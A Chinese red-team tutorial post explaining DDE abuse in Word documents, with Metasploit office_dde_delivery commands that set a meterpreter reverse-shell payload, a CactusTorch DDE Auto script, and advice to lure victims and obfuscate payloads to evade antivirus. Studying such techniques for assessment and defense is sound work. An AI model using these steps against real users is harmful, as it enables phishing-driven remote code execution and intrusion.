DDE攻击利用介绍

admin 2024年2月12日00:11:55评论14 views字数 1351阅读4分30秒阅读模式

基本介绍

2017年10月SensePost发布了一篇文章并在其中解释了如何在不使用任何宏或脚本的情况下从Microsoft Word文档中执行任意代码,SensePost描述的技术是利用合法的Microsoft Office功能,该功能称为DDE(动态数据交换),DDE旨在允许Microsoft办公应用程序之间传输数据,由于此技术不会使用电子邮件网关可以检测到的恶意宏感染Word文档,因此可以实现与远程代码执行相同的结果,这种攻击非常有效且被广泛用于恶意软件活动和红队评估

利用方式

Metasploit

MSF框架中提供了对DDE漏洞的利用模块,我们可以直接使用该模块生成有效载荷并将其投放给受害者用户诱导其点击运行

msf6 > use exploit/windows/fileformat/office_dde_delivery[*] Using configured payload windows/meterpreter/reverse_tcpmsf6 exploit(windows/fileformat/office_dde_delivery) > show optionsmsf6 exploit(windows/fileformat/office_dde_delivery) > set SRVHOST 192.168.204.135SRVHOST => 192.168.204.135msf6 exploit(windows/fileformat/office_dde_delivery) > set payload windows/x64/meterpreter/reverse_tcppayload => windows/x64/meterpreter/reverse_tcpmsf6 exploit(windows/fileformat/office_dde_delivery) > set LHOST 192.168.204.135LHOST => 192.168.204.135msf6 exploit(windows/fileformat/office_dde_delivery) > show options

DDE攻击利用介绍

诱导目标用户打开文件

DDE攻击利用介绍

随后返回一个meterpreter会话

DDE攻击利用介绍

操作会话执行命令:

DDE攻击利用介绍

CactusTorch

William Genovese开发了一个名为CactusTorch DDE Auto的bash脚本,它利用CactusTorch工具生成有效负载并利用Metasploit框架配置来接收连接的侦听器

项目地址:https://github.com/xillwillx/CACTUSTORCH_DDEAUTO

使用方法:

chmod +x cactus.sh ./cactus.sh

DDE攻击利用介绍

CactusTorch DDE Auto可以生成JS、VBS和HTA格式的有效载荷

DDE攻击利用介绍

构造word文档

DDE攻击利用介绍

DDE攻击利用介绍

DDE攻击利用介绍

随后我们便可以收到会话

DDE攻击利用介绍

切换进入session执行各类命令:

DDE攻击利用介绍

文末总结

本篇文章主要介绍了DDE以及其漏洞的利用方式和思路,在进行红队安全评估时我们可以通过DDE来实施社工钓鱼等方式进行利用,不过值得一提的是目前很多的防病毒公司正在尝试检测DDE攻击,因此对于构建具有更高可能性逃避检测并在网络中建立初始足迹的有效载荷而言,混淆是必要的

原文始发于微信公众号(七芒星实验室):DDE攻击利用介绍

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月12日00:11:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   DDE攻击利用介绍https://cn-sec.com/archives/2488406.html

发表评论

匿名网友 填写信息